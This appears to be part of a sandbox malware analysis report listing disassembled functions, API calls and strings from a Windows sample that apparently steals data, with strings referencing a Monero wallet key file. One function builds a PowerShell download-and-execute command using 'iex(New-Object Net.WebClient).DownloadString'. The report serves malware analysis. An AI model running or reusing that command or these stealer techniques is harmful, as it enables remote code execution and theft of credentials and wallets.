                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: 415d2a69fed172125bc8191c4c4984bdec59f78158243cfd82deec7ed653c376
                    • Instruction ID: 14d2507573cb99a151b9ec19528eb47efd8a345702f8602bd2eb5d01b629330e
                    • Opcode Fuzzy Hash: 415d2a69fed172125bc8191c4c4984bdec59f78158243cfd82deec7ed653c376
                    • Instruction Fuzzy Hash: B9314FB2900218A7CF14FBB0DC85FEA737CAB98700F444989B75997091EE74A789CF95
                    Function 00962C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00962D85
                    Strings
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00962D04
                    • ')", xrefs: 00962CB3
                    • <, xrefs: 00962D39
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00962CC4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: e211b59094e64f98de4eaea0732ebf1fae38ea78ccf6213f49ca40fed4e9ec59
                    • Instruction ID: a117790c6ea1301d7da6d6e255618b1f465060aba082b794d8bfb6183ee2c8d0
                    • Opcode Fuzzy Hash: e211b59094e64f98de4eaea0732ebf1fae38ea78ccf6213f49ca40fed4e9ec59
                    • Instruction Fuzzy Hash: DA41EE71C102089ADB18FFA0CC96BEEBB78AF90340F504119F106B7191EF746A4ACF96
                    Function 00959E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                    Download Yara Rule
                    APIs
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00959F41
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 4171519190-1096346117
                    • Opcode ID: 8e53eaae86900265958b28d891892a5e65f9111df5aad759c6a2760d0b1b9171
                    • Instruction ID: cc63208a5fe2f420cd235f24618bd11d1ac8409d0adb1942dd0629b903e7e052
                    • Opcode Fuzzy Hash: 8e53eaae86900265958b28d891892a5e65f9111df5aad759c6a2760d0b1b9171
                    • Instruction Fuzzy Hash: 53614F71A10248EFDB14EFA5CC96FED7775AF85344F008118F90A6B191EB746A0ACB92
                    Function 00966920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 0096696C
                    • sscanf.NTDLL ref: 00966999
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009669B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009669C0
                    • ExitProcess.KERNEL32 ref: 009669DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    • Opcode ID: 852e1f1ebfa751098ad1e3867109b58c2f99e4eb8151fdbcca0ff1aa5a77fbb5
                    • Instruction ID: 8c98b2c131548a6f839d70dab3d6d40e43beae8f37fa2b691a00d549a5dd9626
                    • Opcode Fuzzy Hash: 852e1f1ebfa751098ad1e3867109b58c2f99e4eb8151fdbcca0ff1aa5a77fbb5
                    • Instruction Fuzzy Hash: E121A9B5D14209ABCF08EFE4D955AEEB7B9BF48300F04852AE506F3250EB345605CBA9
                    Function 00967E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967E37
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00967E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,005AC128,00000000,00020119,?), ref: 00967E5E
                    • RegQueryValueExA.ADVAPI32(?,005BDA60,00000000,00000000,000000FF,000000FF), ref: 00967E7F
                    • RegCloseKey.ADVAPI32(?), ref: 00967E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: eedb30af7c2f98b99dfe3028a5c6a26be2dc4ccd24570ccb00103e26d76329bf
                    • Instruction ID: 488b19d0f7f25a9583808bf63078d0f271228db0d00a541956c71c25f2c701e6
                    • Opcode Fuzzy Hash: eedb30af7c2f98b99dfe3028a5c6a26be2dc4ccd24570ccb00103e26d76329bf
                    • Instruction Fuzzy Hash: 60119EB1A44205EBD700CFD4DE8AFBBFBB8EB44B04F10415AFA05A7290DB7958048BE1
                    Function 00969260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                    Download Yara Rule
                    APIs
                    • StrStrA.SHLWAPI(005BDF30,?,?,?,0096140C,?,005BDF30,00000000), ref: 0096926C
                    • lstrcpyn.KERNEL32(00B9AB88,005BDF30,005BDF30,?,0096140C,?,005BDF30), ref: 00969290
                    • lstrlen.KERNEL32(?,?,0096140C,?,005BDF30), ref: 009692A7
                    • wsprintfA.USER32 ref: 009692C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: dc7b4b91017088a726ff1a171b722cf5c06b090df25674f1b65e5160f97c6b97
                    • Instruction ID: 982c272ac6f3c6b41422d887b9e1edb24f3cede4360ef31876a417ac7dd80af6
                    • Opcode Fuzzy Hash: dc7b4b91017088a726ff1a171b722cf5c06b090df25674f1b65e5160f97c6b97
                    • Instruction Fuzzy Hash: BB01DA76500108FFCB04DFECCA99EAE7BB9EB48354F108598F9099B204CA35AE40DBD1
                    Function 009512A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009512B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 009512BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009512D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009512F5
                    • RegCloseKey.ADVAPI32(?), ref: 009512FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 5e911dc4bd5b07d62345a50bd58ebb82ae1278863fdfbb5b6960a65f94d02190
                    • Instruction ID: e9a096f9f174ac0cf34bd206b40b076379726202c857acc9e731a8f3b731c6b5
                    • Opcode Fuzzy Hash: 5e911dc4bd5b07d62345a50bd58ebb82ae1278863fdfbb5b6960a65f94d02190
                    • Instruction Fuzzy Hash: 240136B5A40208BBDB00DFE0DD89FAEB7BCEB48701F008155FA05D7280DA749A018F91
                    Function 0096C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: String___crt$Type
                    • String ID:
                    • API String ID: 2109742289-3916222277
                    • Opcode ID: d4493d971c162e5fd9a6909475ad764fe51e11c19670898fced6e49caf57a8a0
                    • Instruction ID: db7bdf45461523f61ea20c386c8fb5430a4c538c325cad495c2dd362dc933cdb
                    • Opcode Fuzzy Hash: d4493d971c162e5fd9a6909475ad764fe51e11c19670898fced6e49caf57a8a0
                    • Instruction Fuzzy Hash: 7841D4B150079C5EDB318B24CD84FFBBBEDAF45704F1448A8E9CA97182E271AA44DF60
                    Function 00966630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00966663
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00966726
                    • ExitProcess.KERNEL32 ref: 00966755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: 6d0d7bcb534b71f6620b975d34ff108fc095ad524e231a7a3f11a8a6a93cd399
                    • Instruction ID: 45b718ab5afcc3402414e383aae297f1f5b46af8360d45a7784d98e83b838566
                    • Opcode Fuzzy Hash: 6d0d7bcb534b71f6620b975d34ff108fc095ad524e231a7a3f11a8a6a93cd399
                    • Instruction Fuzzy Hash: 2B3129B1901218AADB14EB90DD96BDEB778AF94300F40418AF20977191DF746B48CFAA
                    Function 009687C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00970E28,00000000,?), ref: 0096882F
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00968836
                    • wsprintfA.USER32 ref: 00968850
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 1695172769-2206825331
                    • Opcode ID: 00ec8b0eee01c5631145255627713236f3370d8c7741f1f0ca2d3d2cc4b32d39
                    • Instruction ID: 8a21436e0236dff3d23e0fd6716b88fc61102a75575aaff61f4903582b67a25c
                    • Opcode Fuzzy Hash: 00ec8b0eee01c5631145255627713236f3370d8c7741f1f0ca2d3d2cc4b32d39
                    • Instruction Fuzzy Hash: F32112B1E40204AFDB04DFD4DD49FAEBBB8FB48711F104159F605A7290CB79A901CBA1
                    Function 00968D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0096951E,00000000), ref: 00968D5B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00968D62
                    • wsprintfW.USER32 ref: 00968D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
